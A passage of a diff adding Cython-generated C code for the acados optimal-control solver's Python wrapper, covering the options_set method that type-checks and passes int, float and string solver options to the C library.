__Pyx_GIVEREF(__pyx_n_u_rti_phase); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_rti_phase); + __Pyx_INCREF(__pyx_n_u_initialize_t_slacks); + __Pyx_GIVEREF(__pyx_n_u_initialize_t_slacks); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_initialize_t_slacks); + __Pyx_INCREF(__pyx_n_u_qp_warm_start); + __Pyx_GIVEREF(__pyx_n_u_qp_warm_start); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_qp_warm_start); + __Pyx_INCREF(__pyx_n_u_line_search_use_sufficient_desce); + __Pyx_GIVEREF(__pyx_n_u_line_search_use_sufficient_desce); + PyList_SET_ITEM(__pyx_t_1, 4, __pyx_n_u_line_search_use_sufficient_desce); + __Pyx_INCREF(__pyx_n_u_full_step_dual); + __Pyx_GIVEREF(__pyx_n_u_full_step_dual); + PyList_SET_ITEM(__pyx_t_1, 5, __pyx_n_u_full_step_dual); + __Pyx_INCREF(__pyx_n_u_globalization_use_SOC); + __Pyx_GIVEREF(__pyx_n_u_globalization_use_SOC); + PyList_SET_ITEM(__pyx_t_1, 6, __pyx_n_u_globalization_use_SOC); + __Pyx_INCREF(__pyx_n_u_warm_start_first_qp); + __Pyx_GIVEREF(__pyx_n_u_warm_start_first_qp); + PyList_SET_ITEM(__pyx_t_1, 7, __pyx_n_u_warm_start_first_qp); + __pyx_v_int_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":658 + * """ + * int_fields = ['print_level', 'rti_phase', 'initialize_t_slacks', 'qp_warm_start', 'line_search_use_sufficient_descent', 'full_step_dual', 'globalization_use_SOC', 'warm_start_first_qp'] + * double_fields = ['step_length', 'tol_eq', 'tol_stat', 'tol_ineq', 'tol_comp', 'alpha_min', 'alpha_reduction', 'eps_sufficient_descent', # <<<<<<<<<<<<<< + * 'qp_tol_stat', 'qp_tol_eq', 'qp_tol_ineq', 'qp_tol_comp', 'qp_tau_min', 'qp_mu0'] + * string_fields = ['globalization'] + */ + __pyx_t_1 = PyList_New(14); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 658, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_step_length); + __Pyx_GIVEREF(__pyx_n_u_step_length); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_step_length); + __Pyx_INCREF(__pyx_n_u_tol_eq); + __Pyx_GIVEREF(__pyx_n_u_tol_eq); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_tol_eq); + __Pyx_INCREF(__pyx_n_u_tol_stat); + __Pyx_GIVEREF(__pyx_n_u_tol_stat); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_tol_stat); + __Pyx_INCREF(__pyx_n_u_tol_ineq); + __Pyx_GIVEREF(__pyx_n_u_tol_ineq); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_tol_ineq); + __Pyx_INCREF(__pyx_n_u_tol_comp); + __Pyx_GIVEREF(__pyx_n_u_tol_comp); + PyList_SET_ITEM(__pyx_t_1, 4, __pyx_n_u_tol_comp); + __Pyx_INCREF(__pyx_n_u_alpha_min); + __Pyx_GIVEREF(__pyx_n_u_alpha_min); + PyList_SET_ITEM(__pyx_t_1, 5, __pyx_n_u_alpha_min); + __Pyx_INCREF(__pyx_n_u_alpha_reduction); + __Pyx_GIVEREF(__pyx_n_u_alpha_reduction); + PyList_SET_ITEM(__pyx_t_1, 6, __pyx_n_u_alpha_reduction); + __Pyx_INCREF(__pyx_n_u_eps_sufficient_descent); + __Pyx_GIVEREF(__pyx_n_u_eps_sufficient_descent); + PyList_SET_ITEM(__pyx_t_1, 7, __pyx_n_u_eps_sufficient_descent); + __Pyx_INCREF(__pyx_n_u_qp_tol_stat); + __Pyx_GIVEREF(__pyx_n_u_qp_tol_stat); + PyList_SET_ITEM(__pyx_t_1, 8, __pyx_n_u_qp_tol_stat); + __Pyx_INCREF(__pyx_n_u_qp_tol_eq); + __Pyx_GIVEREF(__pyx_n_u_qp_tol_eq); + PyList_SET_ITEM(__pyx_t_1, 9, __pyx_n_u_qp_tol_eq); + __Pyx_INCREF(__pyx_n_u_qp_tol_ineq); + __Pyx_GIVEREF(__pyx_n_u_qp_tol_ineq); + PyList_SET_ITEM(__pyx_t_1, 10, __pyx_n_u_qp_tol_ineq); + __Pyx_INCREF(__pyx_n_u_qp_tol_comp); + __Pyx_GIVEREF(__pyx_n_u_qp_tol_comp); + PyList_SET_ITEM(__pyx_t_1, 11, __pyx_n_u_qp_tol_comp); + __Pyx_INCREF(__pyx_n_u_qp_tau_min); + __Pyx_GIVEREF(__pyx_n_u_qp_tau_min); + PyList_SET_ITEM(__pyx_t_1, 12, __pyx_n_u_qp_tau_min); + __Pyx_INCREF(__pyx_n_u_qp_mu0); + __Pyx_GIVEREF(__pyx_n_u_qp_mu0); + PyList_SET_ITEM(__pyx_t_1, 13, __pyx_n_u_qp_mu0); + __pyx_v_double_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":660 + * double_fields = ['step_length', 'tol_eq', 'tol_stat', 'tol_ineq', 'tol_comp', 'alpha_min', 'alpha_reduction', 'eps_sufficient_descent', + * 'qp_tol_stat', 'qp_tol_eq', 'qp_tol_ineq', 'qp_tol_comp', 'qp_tau_min', 'qp_mu0'] + * string_fields = ['globalization'] # <<<<<<<<<<<<<< + * + * # encode + */ + __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 660, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_globalization); + __Pyx_GIVEREF(__pyx_n_u_globalization); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_globalization); + __pyx_v_string_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":663 + * + * # encode + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * cdef int int_value + */ + if (unlikely(__pyx_v_field_ == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 663, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 663, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_field = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":670 + * + * # check field availability and type + * if field_ in int_fields: # <<<<<<<<<<<<<< + * if not isinstance(value_, int): + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) + */ + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_int_fields, Py_EQ)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 670, __pyx_L1_error) + if (__pyx_t_2) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":671 + * # check field availability and type + * if field_ in int_fields: + * if not isinstance(value_, int): # <<<<<<<<<<<<<< + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) + * + */ + __pyx_t_2 = PyInt_Check(__pyx_v_value_); + __pyx_t_3 = (!__pyx_t_2); + if (unlikely(__pyx_t_3)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":672 + * if field_ in int_fields: + * if not isinstance(value_, int): + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) # <<<<<<<<<<<<<< + * + * if field_ == 'rti_phase': + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_solver_option_must_be_of_type_in, __pyx_n_s_format); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 672, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_field_, ((PyObject *)Py_TYPE(__pyx_v_value_))}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 672, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_t_4 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 672, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(0, 672, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":671 + * # check field availability and type + * if field_ in int_fields: + * if not isinstance(value_, int): # <<<<<<<<<<<<<< + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":674 + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) + * + * if field_ == 'rti_phase': # <<<<<<<<<<<<<< + * if value_ < 0 or value_ > 2: + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + */ + __pyx_t_3 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_rti_phase, Py_EQ)); if (unlikely((__pyx_t_3 < 0))) __PYX_ERR(0, 674, __pyx_L1_error) + if (__pyx_t_3) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":675 + * + * if field_ == 'rti_phase': + * if value_ < 0 or value_ > 2: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + */ + __pyx_t_4 = PyObject_RichCompare(__pyx_v_value_, __pyx_int_0, Py_LT); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 675, __pyx_L1_error) + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 675, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (!__pyx_t_2) { + } else { + __pyx_t_3 = __pyx_t_2; + goto __pyx_L7_bool_binop_done; + } + __pyx_t_4 = PyObject_RichCompare(__pyx_v_value_, __pyx_int_2, Py_GT); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 675, __pyx_L1_error) + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 675, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_3 = __pyx_t_2; + __pyx_L7_bool_binop_done:; + if (unlikely(__pyx_t_3)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":676 + * if field_ == 'rti_phase': + * if value_ < 0 or value_ > 2: + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' # <<<<<<<<<<<<<< + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + * if self.nlp_solver_type != 'SQP_RTI' and value_ > 0: + */ + __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_tuple__27, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 676, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(0, 676, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":675 + * + * if field_ == 'rti_phase': + * if value_ < 0 or value_ > 2: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":678 + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + * if self.nlp_solver_type != 'SQP_RTI' and value_ > 0: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + * 'take only value 0 for SQP-type solvers') + */ + __pyx_t_2 = (__Pyx_PyUnicode_Equals(__pyx_v_self->nlp_solver_type, __pyx_n_u_SQP_RTI, Py_NE)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 678, __pyx_L1_error) + if (__pyx_t_2) { + } else { + __pyx_t_3 = __pyx_t_2; + goto __pyx_L10_bool_binop_done; + } + __pyx_t_4 = PyObject_RichCompare(__pyx_v_value_, __pyx_int_0, Py_GT); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 678, __pyx_L1_error) + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 678, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_3 = __pyx_t_2; + __pyx_L10_bool_binop_done:; + if (unlikely(__pyx_t_3)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":679 + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + * if self.nlp_solver_type != 'SQP_RTI' and value_ > 0: + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' # <<<<<<<<<<<<<< + * 'take only value 0 for SQP-type solvers') + * + */ + __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_tuple__28, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 679, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(0, 679, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":678 + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + * if self.nlp_solver_type != 'SQP_RTI' and value_ > 0: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + * 'take only value 0 for SQP-type solvers') + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":674 + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) + * + * if field_ == 'rti_phase': # <<<<<<<<<<<<<< + * if value_ < 0 or value_ > 2: + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":682 + * 'take only value 0 for SQP-type solvers') + * + * int_value = value_ # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &int_value) + * + */ + __pyx_t_6 = __Pyx_PyInt_As_int(__pyx_v_value_); if (unlikely((__pyx_t_6 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 682, __pyx_L1_error) + __pyx_v_int_value = __pyx_t_6; + + /* "acados_template/acados_ocp_solver_pyx.pyx":683 + * + * int_value = value_ + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &int_value) # <<<<<<<<<<<<<< + * + * elif field_ in double_fields: + */ + __pyx_t_7 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_7) && PyErr_Occurred())) __PYX_ERR(0, 683, __pyx_L1_error) + ocp_nlp_solver_opts_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_opts, __pyx_t_7, ((void *)(&__pyx_v_int_value))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":670 + * + * # check field availability and type + * if field_ in int_fields: # <<<<<<<<<<<<<< + * if not isinstance(value_, int): + * raise Exception('solver option {} must be of type int. You have {}.'.format(field_, type(value_))) + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":685 + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &int_value) + * + * elif field_ in double_fields: # <<<<<<<<<<<<<< + * if not isinstance(value_, float): + * raise Exception('solver option {} must be of type float. You have {}.'.format(field_, type(value_))) + */ + __pyx_t_3 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_double_fields, Py_EQ)); if (unlikely((__pyx_t_3 < 0))) __PYX_ERR(0, 685, __pyx_L1_error) + if (__pyx_t_3) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":686 + * + * elif field_ in double_fields: + * if not isinstance(value_, float): # <<<<<<<<<<<<<< + * raise Exception('solver option {} must be of type float. You have {}.'.format(field_, type(value_))) + * + */ + __pyx_t_3 = PyFloat_Check(__pyx_v_value_); + __pyx_t_2 = (!__pyx_t_3); + if (unlikely(__pyx_t_2)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":687 + * elif field_ in double_fields: + * if not isinstance(value_, float): + * raise Exception('solver option {} must be of type float. You have {}.'.format(field_, type(value_))) # <<<<<<<<<<<<<< + * + * double_value = value_ + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_solver_option_must_be_of_type_fl, __pyx_n_s_format); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 687, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_field_, ((PyObject *)Py_TYPE(__pyx_v_value_))}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 687, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 687, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 687, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":686 + * + * elif field_ in double_fields: + * if not isinstance(value_, float): # <<<<<<<<<<<<<< + * raise Exception('solver option {} must be of type float. You have {}.'.format(field_, type(value_))) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":689 + * raise Exception('solver option {} must be of type float. You have {}.'.format(field_, type(value_))) + * + * double_value = value_ # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &double_value) + * + */ + __pyx_t_8 = __pyx_PyFloat_AsDouble(__pyx_v_value_); if (unlikely((__pyx_t_8 == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 689, __pyx_L1_error) + __pyx_v_double_value = __pyx_t_8; + + /* "acados_template/acados_ocp_solver_pyx.pyx":690 + * + * double_value = value_ + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &double_value) # <<<<<<<<<<<<<< + * + * elif field_ in string_fields: + */ + __pyx_t_7 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_7) && PyErr_Occurred())) __PYX_ERR(0, 690, __pyx_L1_error) + ocp_nlp_solver_opts_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_opts, __pyx_t_7, ((void *)(&__pyx_v_double_value))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":685 + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &int_value) + * + * elif field_ in double_fields: # <<<<<<<<<<<<<< + * if not isinstance(value_, float): + * raise Exception('solver option {} must be of type float. You have {}.'.format(field_, type(value_))) + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":692 + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &double_value) + * + * elif field_ in string_fields: # <<<<<<<<<<<<<< + * if not isinstance(value_, bytes): + * raise Exception('solver option {} must be of type str. You have {}.'.format(field_, type(value_))) + */ + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_string_fields, Py_EQ)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 692, __pyx_L1_error) + if (likely(__pyx_t_2)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":693 + * + * elif field_ in string_fields: + * if not isinstance(value_, bytes): # <<<<<<<<<<<<<< + * raise Exception('solver option {} must be of type str. You have {}.'.format(field_, type(value_))) + * + */ + __pyx_t_2 = PyBytes_Check(__pyx_v_value_); + __pyx_t_3 = (!__pyx_t_2); + if (unlikely(__pyx_t_3)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":694 + * elif field_ in string_fields: + * if not isinstance(value_, bytes): + * raise Exception('solver option {} must be of type str. You have {}.'.format(field_, type(value_))) # <<<<<<<<<<<<<< + * + * string_value = value_.encode('utf-8') + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_solver_option_must_be_of_type_st, __pyx_n_s_format); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 694, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_field_, ((PyObject *)Py_TYPE(__pyx_v_value_))}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 694, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_t_4 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 694, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(0, 694, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":693 + * + * elif field_ in string_fields: + * if not isinstance(value_, bytes): # <<<<<<<<<<<<<< + * raise Exception('solver option {} must be of type str. You have {}.'.format(field_, type(value_))) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":696 + * raise Exception('solver option {} must be of type str. You have {}.'.format(field_, type(value_))) + * + * string_value = value_.encode('utf-8') # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &string_value[0]) + * + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_value_, __pyx_n_s_encode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 696, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_kp_u_utf_8}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 696, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_9 = __Pyx_PyObject_to_MemoryviewSlice_dc_unsigned_char(__pyx_t_4, PyBUF_WRITABLE); if (unlikely(!__pyx_t_9.memview)) __PYX_ERR(0, 696, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_string_value = __pyx_t_9; + __pyx_t_9.memview = NULL; + __pyx_t_9.data = NULL; + + /* "acados_template/acados_ocp_solver_pyx.pyx":697 + * + * string_value = value_.encode('utf-8') + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &string_value[0]) # <<<<<<<<<<<<<< + * + * else: + */ + __pyx_t_7 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_7) && PyErr_Occurred())) __PYX_ERR(0, 697, __pyx_L1_error) + __pyx_t_10 = 0; + __pyx_t_6 = -1; + if (__pyx_t_10 < 0) { + __pyx_t_10 += __pyx_v_string_value.shape[0]; + if (unlikely(__pyx_t_10 < 0)) __pyx_t_6 = 0; + } else if (unlikely(__pyx_t_10 >= __pyx_v_string_value.shape[0])) __pyx_t_6 = 0; + if (unlikely(__pyx_t_6 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_6); + __PYX_ERR(0, 697, __pyx_L1_error) + } + ocp_nlp_solver_opts_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_opts, __pyx_t_7, ((void *)(&(*((unsigned char *) ( /* dim=0 */ ((char *) (((unsigned char *) __pyx_v_string_value.data) + __pyx_t_10)) )))))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":692 + * acados_solver_common.ocp_nlp_solver_opts_set(self.nlp_config, self.nlp_opts, field, &double_value) + * + * elif field_ in string_fields: # <<<<<<<<<<<<<< + * if not isinstance(value_, bytes): + * raise Exception('solver option {} must be of type str. You have {}.'.format(field_, type(value_))) + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":700 + * + * else: + * raise Exception('AcadosOcpSolverCython.options_set() does not support field {}.'\ # <<<<<<<<<<<<<< + * '\n Possible values are {}.'.format(field_, ', '.join(int_fields + double_fields + string_fields))) + * + */ + /*else*/ { + + /* "acados_template/acados_ocp_solver_pyx.pyx":701 + * else: + * raise Exception('AcadosOcpSolverCython.options_set() does not support field {}.'\ + * '\n Possible values are {}.'.format(field_, ', '.join(int_fields + double_fields + string_fields))) # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_AcadosOcpSolverCython_options_se, __pyx_n_s_format); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 701, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyNumber_Add(__pyx_v_int_fields, __pyx_v_double_fields); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 701, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_11 = PyNumber_Add(__pyx_t_5, __pyx_v_string_fields); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 701, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = PyUnicode_Join(__pyx_kp_u__29, __pyx_t_11); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 701, __pyx_L1_error) + 